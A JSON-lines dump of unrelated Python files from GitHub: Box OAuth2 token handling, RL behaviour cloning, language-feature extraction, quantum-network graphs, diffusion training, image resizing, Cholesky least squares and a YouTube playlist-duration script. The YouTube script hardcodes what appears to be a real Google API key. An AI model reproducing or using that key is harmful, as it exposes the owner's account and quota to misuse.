self._network_layer = network_layer if network_layer else DefaultNetwork()\n self._refresh_lock = refresh_lock or Lock()\n self._box_device_id = box_device_id\n self._box_device_name = box_device_name\n\n @property\n def access_token(self):\n \"\"\"\n Get the current access token.\n\n :return:\n current access token\n :rtype:\n `unicode`\n \"\"\"\n return self._access_token\n\n def get_authorization_url(self, redirect_url):\n \"\"\"\n Get the authorization url based on the client id and the redirect url, passed in\n\n :param redirect_url:\n An HTTPS URI or custom URL scheme where the response will be redirected. Optional if the redirect URI is\n registered with Box already.\n :type redirect_url:\n `unicode` or None\n :return:\n A tuple of the URL of Box’s authorization page and the CSRF token.\n This is the URL that your application should forward the user to in first leg of OAuth 2.\n :rtype:\n (`unicode`, `unicode`)\n \"\"\"\n csrf_token = self._get_state_csrf_token()\n # For the query string parameters, use a sequence of two-element\n # tuples, rather than a dictionary, in order to get a consistent and\n # predictable order of parameters in the output of `urlencode()`.\n params = [\n ('state', csrf_token),\n ('response_type', 'code'),\n ('client_id', self._client_id),\n ]\n if redirect_url:\n params.append(('redirect_uri', redirect_url))\n # `urlencode()` doesn't work with non-ASCII unicode characters, so\n # encode the parameters as ASCII bytes.\n params = [(key.encode('utf-8'), value.encode('utf-8')) for (key, value) in params]\n query_string = urlencode(params)\n return urlunsplit(('', '', API.OAUTH2_AUTHORIZE_URL, query_string, '')), csrf_token\n\n def authenticate(self, auth_code):\n \"\"\"\n Send token request and return the access_token, refresh_token tuple. The access token and refresh token will be\n stored by calling the `store_tokens` callback if provided in __init__.\n\n :param auth_code:\n An authorization code you retrieved in the first leg of OAuth 2.\n :type auth_code:\n `unicode` or None\n\n :return:\n (access_token, refresh_token)\n :rtype:\n (`unicode`, `unicode`)\n \"\"\"\n data = {\n 'grant_type': 'authorization_code',\n 'code': auth_code,\n 'client_id': self._client_id,\n 'client_secret': self._client_secret,\n }\n if self._box_device_id:\n data['box_device_id'] = self._box_device_id\n if self._box_device_name:\n data['box_device_name'] = self._box_device_name\n return self.send_token_request(data, access_token=None)\n\n def _refresh(self, access_token):\n data = {\n 'grant_type': 'refresh_token',\n 'refresh_token': self._refresh_token,\n 'client_id': self._client_id,\n 'client_secret': self._client_secret,\n }\n if self._box_device_id:\n data['box_device_id'] = self._box_device_id\n if self._box_device_name:\n data['box_device_name'] = self._box_device_name\n\n return self.send_token_request(data, access_token)\n\n def _get_tokens(self):\n \"\"\"\n Get the current access and refresh tokens.\n\n :return:\n Tuple containing the current access token and refresh token.\n :rtype:\n `tuple` of (`unicode`, `unicode`)\n \"\"\"\n return self._access_token, self._refresh_token\n\n def refresh(self, access_token_to_refresh):\n \"\"\"\n Refresh the access token and the refresh token and return the access_token, refresh_token tuple. The access\n token and refresh token will be stored by calling the `store_tokens` callback if provided in __init__.\n\n :param access_token_to_refresh:\n The expired access token, which needs to be refreshed.\n :type access_token_to_refresh:\n `unicode`\n \"\"\"\n with self._refresh_lock:\n access_token, refresh_token = self._get_tokens()\n # The lock here is for handling that case that multiple requests fail, due to access token expired, at the\n # same time to avoid multiple session renewals.\n if access_token_to_refresh == access_token:\n # If the active access token is the same as the token needs to be refreshed, we make the request to\n # refresh the token.\n return self._refresh(access_token_to_refresh)\n else:\n # If the active access token (self._access_token) is not the same as the token needs to be refreshed,\n # it means the expired token has already been refreshed. Simply return the current active tokens.\n return access_token, refresh_token\n\n @staticmethod\n def _get_state_csrf_token():\n \"\"\" Generate a random state CSRF token to be used in the authorization url.\n Example: box_csrf_token_Iijw9aU31sNdgiQu\n\n :return:\n The security token\n :rtype:\n `unicode`\n \"\"\"\n system_random = random.SystemRandom()\n ascii_alphabet = string.ascii_letters + string.digits\n ascii_len = len(ascii_alphabet)\n return 'box_csrf_token_' + ''.join(ascii_alphabet[int(system_random.random() * ascii_len)] for _ in range(16))\n\n def _store_tokens(self, access_token, refresh_token):\n if self._store_tokens_callback is not None:\n self._store_tokens_callback(access_token, refresh_token)\n\n def send_token_request(self, data, access_token, expect_refresh_token=True):\n \"\"\"\n Send the request to acquire or refresh an access token.\n\n :param data:\n Dictionary containing the request parameters as specified by the Box API.\n :type data:\n `dict`\n :param access_token:\n The current access token.\n :type access_token:\n `unicode` or None\n :return:\n The access token and refresh token.\n :rtype:\n (`unicode`, `unicode`)\n \"\"\"\n url = '{base_auth_url}/token'.format(base_auth_url=API.OAUTH2_API_URL)\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n network_response = self._network_layer.request(\n 'POST',\n url,\n data=data,\n headers=headers,\n access_token=access_token\n )\n if not network_response.ok:\n raise BoxOAuthException(network_response.status_code, network_response.content, url, 'POST')\n try:\n response = network_response.json()\n self._access_token = response['access_token']\n self._refresh_token = response.get('refresh_token', None)\n if self._refresh_token is None and expect_refresh_token:\n raise BoxOAuthException(network_response.status_code, network_response.content, url, 'POST')\n except (ValueError, KeyError):\n raise BoxOAuthException(network_response.status_code, network_response.content, url, 'POST')\n self._store_tokens(self._access_token, self._refresh_token)\n return self._access_token, self._refresh_token\n","repo_name":"LockScreen/Backend","sub_path":"venv/lib/python2.7/site-packages/boxsdk/auth/oauth2.py","file_name":"oauth2.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"11216013124","text":"import pickle\nimport tensorflow as tf\nimport numpy as np\nimport gym\nimport load_policy\nfrom tensorflow.contrib.layers import fully_connected\n\n\ndef train_bs():\n with open('expert_Data/Humanoid-v2.pkl', 'rb') as file:\n data = pickle.load(file)\n\n actions = data['actions']\n observations = data['observations']\n\n actions_shape = list(actions.shape)\n observations_shape = list(observations.shape)\n\n actions_shape[0] = None\n observations_shape[0] = None\n\n input = tf.placeholder(dtype=tf.float32,shape=observations_shape)\n label = tf.placeholder(dtype=tf.float32,shape=actions_shape)\n\n hidden1 = fully_connected(input, num_outputs=256, activation_fn=tf.nn.tanh)\n hidden2 = fully_connected(hidden1, num_outputs=128, activation_fn=tf.nn.tanh)\n hidden3 = fully_connected(hidden2, num_outputs=64, activation_fn=tf.nn.tanh)\n output = fully_connected(hidden3, num_outputs=actions_shape[-1], activation_fn=None)\n output = tf.expand_dims(output, axis=1)\n\n loss = tf.losses.mean_squared_error(labels=label, predictions=output)\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n\n def get_batch(index, batch_size = 1024):\n\n np.random.shuffle(index)\n batchs= []\n for i in range(len(index)):\n batchs.append(i)\n if len(batchs) == batch_size:\n yield batchs\n batchs = []\n\n if len(batchs) != 0:\n yield batchs\n\n epoch = 60\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n index = np.arange(len(actions))\n for i in range(epoch):\n batch_loss =[]\n for batch_index in get_batch(index):\n batch_x, batch_y = observations[batch_index], actions[batch_index]\n _, loss_val = sess.run([optimizer, loss], feed_dict={input: batch_x, label:batch_y})\n batch_loss.append(loss_val)\n print('batch_loss is {}'.format(np.average(batch_loss)))\n\n policy = lambda x: sess.run(output, feed_dict={input: x})\n get_performence(policy)\n\ndef get_performence(policy):\n\n env = gym.make(args.envname)\n max_steps = args.max_timesteps or env.spec.timestep_limit\n\n returns = []\n observations= []\n actions= []\n for i in range(args.num_rollouts):\n print('iter', i)\n obs = env.reset()\n done = False\n totalr, total_bs = 0., 0.\n steps = 0\n while not done:\n action = policy(obs[None, :])\n observations.append(obs)\n actions.append(action)\n obs, r, done, _ = env.step(action)\n totalr += r\n steps += 1\n if steps % 100 == 0: print(\"%i/%i\" % (steps, max_steps))\n if steps >= max_steps:\n break\n returns.append(totalr)\n\n print('returns', returns)\n print('mean return', np.mean(returns))\n print('std of return', np.std(returns))\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('expert_policy_file', type=str)\n parser.add_argument('envname', type=str)\n parser.add_argument('--render', action='store_true')\n parser.add_argument(\"--max_timesteps\", type=int)\n parser.add_argument('--num_rollouts', type=int, default=20,\n help='Number of expert roll outs')\n args = parser.parse_args()\n train_bs()\n\n\n\n\n\n\n\n","repo_name":"lianglizxc/RLhomework","sub_path":"hw1/behavior_clone.py","file_name":"behavior_clone.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8572856625","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 14 01:44:25 2017\r\n\r\n@author: akumar\r\n\r\nCode tested in Python3.6\r\n\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\n\r\n#class GenerateFeatures(object):\r\ndef generateFeatures(filename):\r\n file_train = pd.read_csv('{0}.csv'.format(filename), sep=',', header= 0 , dtype = {'Id':int ,'Text':str})\r\n file_train['Text'] = file_train['Text'].str.replace(u'![\\u4e00-\\u9fff,。/【】、v;‘:\\\"\\\",./[]-={}]+' , '')\r\n file_train['Text'] = file_train['Text'].str.replace('http(.*) ','')\r\n file_train['Text'] = file_train['Text'].str.replace('URL(.*) ', '')\r\n file_train['Text'] = file_train['Text'].str.replace(r'(.)\\1+', r'\\1\\1')\r\n \r\n #print(file_train['Text'])\r\n vector = TfidfVectorizer(analyzer='char')\r\n x = vector.fit_transform(file_train['Text'].values.astype('U')).toarray()\r\n for i,col in enumerate(vector.get_feature_names()):\r\n if (ord(col)>=97 and ord(col)<=122) or (ord(col)>=192 and ord(col)<=696):# or (ord(col)>=65 and ord(col)<=90):\r\n #print(col)\r\n file_train[col] = x[:, i]\r\n # self.alphabet_reference[col] = 0\r\n features = file_train.drop('Id',axis=1)\r\n features = features.drop('Text',axis = 1)\r\n #print(self.alphabet_reference)\r\n #print(features)\r\n features.to_csv('{0}_features.csv'.format(filename), sep=',', encoding='utf-8',index=False)\r\n \r\ndef commonFeatures(filename1,filename2):\r\n df1 = pd.read_csv('{0}.csv'.format(filename1), sep=',',header = 0)\r\n# print (df1.columns)\r\n df2 = pd.read_csv('{0}.csv'.format(filename2), sep=',',header = 0)\r\n# print (df2.columns)\r\n list1 = list(df1.columns)\r\n list2 = list(df2.columns)\r\n common = list(set(list1).intersection(list2))\r\n remove1 = list(set(list1).difference(common))\r\n remove2 = list(set(list2).difference(common))\r\n df1 = df1.drop(remove1,axis=1)\r\n df2 = df2.drop(remove2,axis=1)\r\n df1.to_csv('{0}.csv'.format(filename1), sep=',', encoding='utf-8',index = False)\r\n df2.to_csv('{0}.csv'.format(filename2), sep=',', encoding='utf-8',index = False)\r\n\r\ndef combine_xy_vectors(filename1,filename2):\r\n train_x = pd.read_csv('{0}.csv'.format(filename1), sep=',',header = 0)\r\n train_x = train_x.loc[:, ~train_x.columns.str.contains('^Unnamed')]\r\n train_y = pd.read_csv('{0}.csv'.format(filename2), sep=',',header = 0)\r\n train_y = train_y.loc[:, ~train_y.columns.str.contains('^Unnamed')]\r\n if(len(train_x)==len(train_y)):\r\n print(\"Merging x and y vectors according to the ids\")\r\n train_x['category'] = train_y.Category\r\n train_x.to_csv('trainingSet.csv', sep=',', encoding='utf-8', index = True)\r\n else:\r\n print(\"Vector lengths of x and y are not equal. Not possible to merger\")\r\n\r\ncreate = 0\r\n\r\ntrain = 'train_set_x'\r\ntest = 'test_set_x'\r\nif(create):\r\n #generate features for the training set \r\n generateFeatures(train)\r\n #generate features for the training set\r\n generateFeatures(test)\r\n #getting common features for making training set and test set in proper format\r\n #filename1 = train+'_features'\r\n #filename2 = test+'_features'\r\n commonFeatures(train+'_features',test+'_features')\r\n \r\nelse:\r\n print (\"Skipping generating features......\")\r\n\r\ncombine_xy_vectors(train+'_features','train_set_y')\r\n","repo_name":"Amarkr1/Language-Classification","sub_path":"generateFeatures.py","file_name":"generateFeatures.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72854079871","text":"import sys\nimport random\nimport math\nimport numpy as np\nimport networkx as nx\nfrom graphs import *\nfrom weights import *\nfrom algorithms import *\nfrom scipy.stats import powerlaw\n\n\ndef get_power_law(alpha,min_value,max_value):\n\tx = powerlaw.rvs(alpha, size=1)\n\treturn max_value - x[0]*(max_value-min_value)\n\ndef H2(p):\n\tif p == 0: \n\t\treturn 0\n\telse:\n\t#print(- p*math.log2(p) - (1-p)*math.log2(1-p))\n\t\treturn - p*math.log2(p) - (1-p)*math.log2(1-p)\n\ndef k(p):\n\treturn 1-H2(3*p/4)\n\ndef create_grid_from_file(filename,fid_min,prob_min,n_nodes,dist_t=\"uniform\"):\n\tt_mem_min = 100000\n\tt_mem_max = 1000000\n\n\ttime_min = 1\n\ttime_max = 100\n\n\tfid_min = fid_min\n\tfid_max = 1.0\n\n\tprob_min = prob_min\n\tprob_max = 1.0\n\tdist_type = random.uniform\n\n\n\n\tfile = open(\"../networks/\"+filename+\".txt\",\"r\")\n\tedges = file.readlines()\n\n\tG1 = Graph()\n\tG2 = nx.Graph()\n\tG3 = nx.Graph()\n \n\tfor i in range(0,n_nodes):\n\t\tt_mem = dist_type(t_mem_min,t_mem_max)\n\t\tprob_swap = dist_type(prob_min,prob_max)\n\t\tname = i\n\t\tG1.add_node(Node(name=name,neighbours={},prob_swap=prob_swap,t_mem=t_mem))\n\t\tG2.add_node(name)\n\t\tG3.add_node(name)\n\t\t#print(G1.nodes[name])\n\n\tfor edge in edges: \n\t\te = edge.strip().split(' ')\n\t\ts = int(e[0])\n\t\tt = int(e[1])\n\n\t\tfid = None\n\t\tif dist_t == \"uniform\":\n\t\t\tfid = dist_type(fid_min,fid_max)\n\t\telif dist_t == \"power_law\":\n\t\t\tfid = get_power_law(2,fid_min,fid_max)\n\t\ttime = dist_type(time_min,time_max)\n\t\tprob_gen = dist_type(prob_min,prob_max)\n\t\tlinka = Link(source=G1.nodes[s], target=G1.nodes[t], fid=fid, prob_gen=prob_gen, time=time)\n\t\t#print(linka)\n\t\tG1.add_link(linka)\n\t\t#G1.print()\n\t\tG2.add_edge(s,t)\n\t\tG3.add_edge(s,t,weight=Capacity(cap=prob_gen*k(1-fid),length=1))\n\n\treturn G1, G2, G3\n\ndef create_grid_from_file_simple(filename,probs,n_nodes):\n\tt_mem = math.inf\n\tprob_swap = 1.\n\ttime = 1\n\tfid = 1.\n\n\tfile = open(\"../networks/\"+filename+\".txt\",\"r\")\n\tedges = file.readlines()\n\n\tG1 = Graph()\n\tG2 = nx.Graph()\n\tG3 = nx.Graph()\n \n\tfor i in range(0,n_nodes):\n\t\t\n\t\tname = i\n\t\tG1.add_node(Node(name=name,neighbours={},prob_swap=prob_swap,t_mem=t_mem))\n\t\tG2.add_node(name)\n\t\tG3.add_node(name)\n\t\t#print(G1.nodes[name])\n\n\tfor edge in edges: \n\t\te = edge.strip().split(' ')\n\t\ts = int(e[0])\n\t\tt = int(e[1])\n\n\t\tprob_gen = random.sample(probs,1)[0]\n\t\tlinka = Link(source=G1.nodes[s], target=G1.nodes[t], fid=fid, prob_gen=prob_gen, time=time)\n\t\tG1.add_link(linka)\n\t\tG2.add_edge(s,t)\n\t\tG3.add_edge(s,t,weight=Capacity(cap=prob_gen*k(1-fid),length=1))\n\n\treturn G1, G2, G3\n\ndef compare_stars(graph,star1,star2,star3):\n\tstar_chosen_rate = None\n\tstar_chosen_fid = None\n\t\n\tstar_rate = 0\n\tstar_fid = 0\n\t#print(star1[0])\n\t#print(star2)\n\t#print(star3)\n\t#Finding optimal rate and optimal fidelity\n\tfor star in star1:\n\t\tif star.weight.rate > star_rate:\n\t\t\tstar_rate = star.weight.rate\n\t\t\tstar_chosen_rate = star\n\n\tfor star in star1:\n\t\tif star.weight.fid > star_fid:\n\t\t\tstar_fid = star.weight.fid\n\t\t\tstar_chosen_fid = star\n\n\tpoint = {\"n_nodes\" : len(graph.nodes),\n\t\t\t \"rate_shortest\" : 0,\n\t\t\t \"fid_shortest\" : 0,\n\t\t\t \"rate_bound\" : 0,\n\t\t\t \"fid_bound\" : 0,\n\t\t\t \"n_links\" : star2[\"dist\"],\n\t\t\t \"n_links_bound\" : sum([len(path) for path in star3[\"star\"]])-3,\n\t\t\t \"valid_shortest\" : True,\n\t\t\t \"valid_bound\" : True}\n\n\t# NO PATH CONNECTING NODES\n\tfor path in star2:\n\t\tif len(path) == 0:\n\t\t\tpoint[\"valid_shortest\"] = False\n\t\t\tpoint[\"valid_bound\"] = False\n\n\t\t\treturn point\n\n\tstar_rec_shortest = [reconstruct_path(graph,path) for path in star2[\"star\"]]\n\tstar_rec_bound = [reconstruct_path(graph,path) for path in star3[\"star\"]]\n\n\t\n\t# FOR A FAIR COMPARISON - remember we are excluding paths with fid < (4*0.5**(1/3)-1)/3\n\tfor path in star_rec_shortest:\n\t\tif path.weight.fid < (4*0.5**(1/3)-1)/3:\n\t\t\tpoint[\"valid_shortest\"] = False\n\n\tfor path in star_rec_bound:\n\t\tif path.weight.fid < (4*0.5**(1/3)-1)/3:\n\t\t\tpoint[\"valid_bound\"] = False\n\n\tif star_rate == 0 or star_fid == 0:\n\t\tpoint[\"valid_shortest\"] = False\n\t\tpoint[\"valid_bound\"] = False\n\n\tif point[\"valid_shortest\"]:\n\t\tstar_compare_shortest = reconstruct_star(graph,list_of_paths=star_rec_shortest)\n\t\tpoint[\"rate_shortest\"] = star_compare_shortest.weight.rate / star_rate\n\t\tpoint[\"fid_shortest\"] = star_compare_shortest.weight.fid / star_fid\n\n\tif point[\"valid_bound\"]:\n\t\tstar_compare_bound = reconstruct_star(graph,list_of_paths=star_rec_bound)\n\t\tpoint[\"rate_bound\"] = star_compare_bound.weight.rate / star_rate\n\t\tpoint[\"fid_bound\"] = star_compare_bound.weight.fid / star_fid\n\n\t\n\tif point[\"rate_shortest\"] > 1.0 or point[\"fid_shortest\"]>1.0 or point[\"rate_bound\"] > 1.0 or point[\"fid_bound\"]>1.0:\n\t\tprint(\"SOMETHING FUNNY IS GOING ON\")\n\t\tprint(\"BEST RATE STAR\")\n\t\tprint(star_chosen_rate)\n\t\tprint(\"BEST FID STAR\")\n\t\tprint(star_chosen_fid)\n\t\tprint(\"BEST DISTANCE STAR\")\n\t\tprint(star_compare)\n\t\tprint(star_compare.get_center_node().print_all_paths())\n\n\n\treturn point\n\n\n\n","repo_name":"luisbugalho/MultipartiteEntanglementRouting","sub_path":"python/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13448043157","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom modules import UNet\nfrom diffusion import Diffusion\nfrom utils import get_data\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nEMBED_DIM = 32\nIMG_HEIGHT = 208\nIMG_WIDTH = 176\n\nmodel_path = 'D:\\python fun projects\\machine learning\\models\\celebdiffusion218x178_48rf(good_old).pth'\ndata_path = 'D:\\python fun projects\\machine learning\\data'\n\nnum_epochs = 1000000\nbatch_size = 1\nlearning_rate = 1e-5\ncounter = 1000\n\ndef train():\n train_dataset, train_loader = get_data(IMG_HEIGHT, IMG_WIDTH, batch_size, data_path)\n\n model = UNet(EMBED_DIM, DEVICE).to(DEVICE)\n\n try:\n model.load_state_dict(torch.load(model_path))\n print('Model Loaded')\n except:\n print('No model found -> Creating new model')\n pass\n\n diffusion = Diffusion(IMG_HEIGHT, IMG_WIDTH, DEVICE)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n l1 = nn.L1Loss()\n n_total_steps = len(train_loader)\n T = 999\n train_size = len(train_dataset)\n\n #Mixed Precision\n scaler = torch.cuda.amp.GradScaler()\n\n for epoch in range(num_epochs):\n for step, images in enumerate(train_loader):\n #print(images.shape)\n images = images[0].cuda()\n #labels = labels.cuda()\n\n t = torch.randint(0, T, (batch_size if step < n_total_steps -1 else train_size - batch_size * step,), device=DEVICE).long()\n noised_images, noise = diffusion.add_noise(images, t)\n\n with torch.cuda.amp.autocast():\n predicted_noise = model(noised_images, t)\n loss = l1(noise, predicted_noise)\n\n optimizer.zero_grad()\n\n scaler.scale(loss).backward()\n\n scaler.step(optimizer)\n scaler.update()\n\n print(f\"\\rEpoch {epoch:04d} | step {step:08d} Loss: {loss.item():<10.4f} with t={t[0]:<10d}\", end='')\n\n if step % counter == 0: \n torch.save(model.state_dict(), model_path)\n print('')\n\ndef test():\n '''\n Uncomment these to test your model\n '''\n train_dataset, train_loader = get_data(IMG_HEIGHT, IMG_WIDTH, batch_size, data_path)\n\n model = UNet(EMBED_DIM, DEVICE).to(DEVICE)\n\n try:\n model.load_state_dict(torch.load(model_path))\n print('Model Loaded')\n except:\n print('No model found -> Creating new model')\n pass\n\n diffusion = Diffusion(IMG_HEIGHT, IMG_WIDTH, DEVICE)\n\n #diffusion.sample_random(model, T = 300, train_dataset=train_dataset)\n diffusion.sample_image(model, T=900)\n #diffusion.sample_image_multiple(model, T=900, num=10)\n #diffusion.sample_random_multiple(model, T=300, train_dataset=train_dataset)\n #diffusion.generate_images(model, T=900, rows=2, cols=2)\n #diffusion.sample_random_one_step(model, T=300, train_dataset=train_dataset)\n #diffusion.generate_images_one_step(model, T=900, rows=3, cols=3)\n #diffusion.compare_generate_images(model, T=900, rows=2, cols=2)\n \n\nif __name__ == '__main__':\n train()\n #test()\n ","repo_name":"dunglam2000vn/diffusion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71897561791","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom PIL import Image\nimport re\n\nfiles = [f for f in os.listdir(\"supplier-data/images/\")]\nfor image in files:\n image_pattern = r'\\w*.tiff'\n if re.match(image_pattern, image):\n im = Image.open(\"supplier-data/images/\" + image)\n print(image)\n newname = image.split(\".\")\n print(newname)\n out600 = im.resize((600, 400))\n outrgb = out600.convert('RGB')\n outrgb.save(\"/home/student-02-fe81eaa9523b/supplier-data/images/\" + newname[0] + \".jpeg\", \"JPEG\")","repo_name":"kubusb/pythonOSgoogle","sub_path":"final_exam/week4_fruit/changeImage.py","file_name":"changeImage.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71154175872","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tools import solve_lower_triangular, solve_upper_triangular\nnp.random.seed(42)\n\n\ndef cholesky(A):\n # Performs a Cholesky factorization A = L*L^T of a matrix A.\n n = A.shape[0]\n L = np.array([[0.0] * n for i in range(n)])\n for i in range(n):\n for k in range(i+1):\n tmp_sum = sum(L[i][j] * L[k][j] for j in range(k))\n \n if (i == k):\n L[i][k] = np.sqrt(A[i][i] - tmp_sum)\n else:\n L[i][k] = (1.0 / L[k][k] * (A[i][k] - tmp_sum))\n return L\n\n\ndef least_squares_cholesky(A, y):\n # Solves the least squares problem Ax = b, for the x that minimizes ||Ax - b||_2, using Cholesky factorization.\n R = cholesky(A.T@A)\n RT = R.T\n w = A.T@y\n z = solve_lower_triangular(R, w)\n x = solve_upper_triangular(RT, z)\n return x","repo_name":"jgslunde/other_courses","sub_path":"MAT4110/oblig1/src/Cholesky.py","file_name":"Cholesky.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34619190573","text":"#########################################################################\r\n### Creador: Carlos Andres Mejias Mieses ###\r\n### Fecha: 2021 12 27 ###\r\n### Proposito: Crear un script que automatice CRUD. ###\r\n### ###\r\n### ###\r\n### ###\r\n#######################################################################\r\n\r\n#TODO: Cambiar el diseño a OOP y automatizar upload.\r\n\r\n\r\napi_key = 'AIzaSyD0w7vp4wnt8D_RZJKddkNzuoRLHs4FV84'\r\napi_version = 'v3'\r\n\r\n\r\nimport os\r\nimport re\r\nimport pickle\r\nfrom datetime import timedelta\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\n\r\n#credentials = None\r\nscopes = dict()\r\nscopes['upload'] = 'https://www.googleapis.com/auth/youtube.upload'\r\nscopes['readonly'] = 'https://www.googleapis.com/auth/youtube.readonly'\r\nscopes['ssl']=['https://www.googleapis.com/auth/youtube.force-ssl']\r\n\r\n\r\n\r\n# #Definicion de objeto de autenticacion.\r\n# flow = InstalledAppFlow.from_client_secrets_file('client_secrets.json', scopes=[scopes['readonly'], scopes['upload']])\r\n\r\n# #run the local server.\r\n# flow.run_local_server(port=8080, prompt='consent')\r\n\r\n#credentials = flow.credentials\r\n\r\n#def get_new_access_token():\r\n#Fetch a new access token once it expires.\r\ndef get_new_access_token():\r\n credentials = None\r\n # token.pickle looks for a file called token.pstores the user's credentials from previously successful logins\r\n if os.path.exists('token.pickle'):\r\n print('Loading Credentials From File...')\r\n with open('token.pickle', 'rb') as token:\r\n credentials = pickle.load(token)\r\n\r\n # If there are no valid credentials available, then either refresh the token or log in.\r\n if not credentials or not credentials.valid:\r\n if credentials and credentials.expired and credentials.refresh_token:\r\n print('Refreshing Access Token...')\r\n credentials.refresh(Request())\r\n else:\r\n print('Fetching New Tokens...')\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n 'client_secrets.json',\r\n scopes=[scopes['readonly'], scopes['upload']]\r\n )\r\n flow.run_local_server(port=8080, prompt='consent',\r\n authorization_prompt_message='')\r\n credentials = flow.credentials\r\n\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as f:\r\n print('Saving Credentials for Future Use...')\r\n pickle.dump(credentials, f) \r\n return credentials\r\n\r\n\r\ncredentials = get_new_access_token()\r\n\r\n\r\n\r\n\r\n\r\ndef get_playlist_time(credentials):\r\n #Iniciacion del objeto de Youtube API.\r\n youtube = build('youtube', 'v3', credentials=credentials)\r\n\r\n #Regular expresions that parse the patterns that the \r\n #API give back.\r\n hours_pattern = re.compile(r'(\\d+)H') #Grab the digits before H.\r\n minutes_pattern = re.compile(r'(\\d+)M') #Grab the digits before M.\r\n seconds_pattern = re.compile(r'(\\d+)S') #Grab the digits before S.\r\n\r\n total_seconds = 0\r\n\r\n\r\n nextPageToken = None\r\n while True:\r\n #request para recibir los detalles de un playlist.\r\n pl_request = youtube.playlistItems().list(\r\n part='contentDetails',\r\n playlistId='PLEsfXFp6DpzRMby_cSoWTFw8zaMdTEXgL',#'PL0-84-yl1fUnRuXGFe_F7qSH1LEnn9LkW',#'PL0glhsZ01I-AsN7PRMNWH9X9XJKVpGSWJ',#'PL-osiE80TeTvipOqomVEeZ1HRrcEvtZB_',#\"PL-osiE80TeTt2d9bfVyTiXJA-UTHn6WwU\",\r\n maxResults=50,\r\n pageToken=nextPageToken\r\n )\r\n #Guarda los resultados en dict\r\n pl_response = pl_request.execute()\r\n\r\n vid_ids = []\r\n for item in pl_response['items']: #busca el key items\r\n vid_ids.append(item['contentDetails']['videoId'])#por cada item añade el id del video y detalles.\r\n\r\n vid_request = youtube.videos().list(\r\n part=\"contentDetails\",\r\n id=','.join(vid_ids)\r\n )\r\n\r\n vid_response = vid_request.execute()\r\n\r\n for item in vid_response['items']:\r\n duration = item['contentDetails']['duration'] #por cada item guardo la duracion de cada video.\r\n #Coge el string de duracion y lo distribuye en hora, minuto y segundo.\r\n hours = hours_pattern.search(duration)\r\n minutes = minutes_pattern.search(duration)\r\n seconds = seconds_pattern.search(duration)\r\n #Ternary expression que cambia de string a int para sumarlo y lo guarda en la variable hora.\r\n hours = int(hours.group(1)) if hours else 0 #if there is a value in hours group them, else give 0 as default.\r\n minutes = int(minutes.group(1)) if minutes else 0\r\n seconds = int(seconds.group(1)) if seconds else 0\r\n #Añade todas las hora, los minutos y segundos.\r\n video_seconds = timedelta(\r\n hours=hours,\r\n minutes=minutes,\r\n seconds=seconds\r\n ).total_seconds() \r\n #Suma los segundo\r\n total_seconds += video_seconds\r\n #the nextPage token returns the value of the next video in the playlist.\r\n nextPageToken = pl_response.get('nextPageToken')\r\n #if there are no more videos in the playlist, break out of the loop.\r\n if not nextPageToken:\r\n break\r\n\r\n total_seconds = int(total_seconds)\r\n\r\n minutes, seconds = divmod(total_seconds, 60)\r\n hours, minutes = divmod(minutes, 60)\r\n\r\n print(f'{hours}:{minutes}:{seconds}')\r\n\r\nget_playlist_time(credentials)\r\n\r\n\r\n\r\n# def upload_video(credentials):\r\n# #Iniciacion del objeto de Youtube API.\r\n# youtube = build('youtube', 'v3', credentials=credentials)\r\n\r\n# def upload_video():\r\n# # token.pickle stores the user's credentials from previously successful logins\r\n# if os.path.exists('token.pickle'):\r\n# print('Loading Credentials From File...')\r\n# with open('token.pickle', 'rb') as token:\r\n# credentials = pickle.load(token)\r\n\r\n\r\n\r\n\r\n# # If there are no valid credentials available, then either refresh the token or log in.\r\n# if not credentials or not credentials.valid:\r\n# if credentials and credentials.expired and credentials.refresh_token:\r\n# print('Refreshing Access Token...')\r\n# credentials.refresh(Request())\r\n# else:\r\n# print('Fetching New Tokens...')\r\n# flow = InstalledAppFlow.from_client_secrets_file(\r\n# 'client_secrets.json',\r\n# scopes=[\r\n# 'https://www.googleapis.com/auth/youtube.readonly'\r\n# ]\r\n# )\r\n\r\n# flow.run_local_server(port=8080, prompt='consent',\r\n# authorization_prompt_message='')\r\n# credentials = flow.credentials\r\n\r\n# # Save the credentials for the next run\r\n# with open('token.pickle', 'wb') as f:\r\n# print('Saving Credentials for Future Use...')\r\n# pickle.dump(credentials, f) 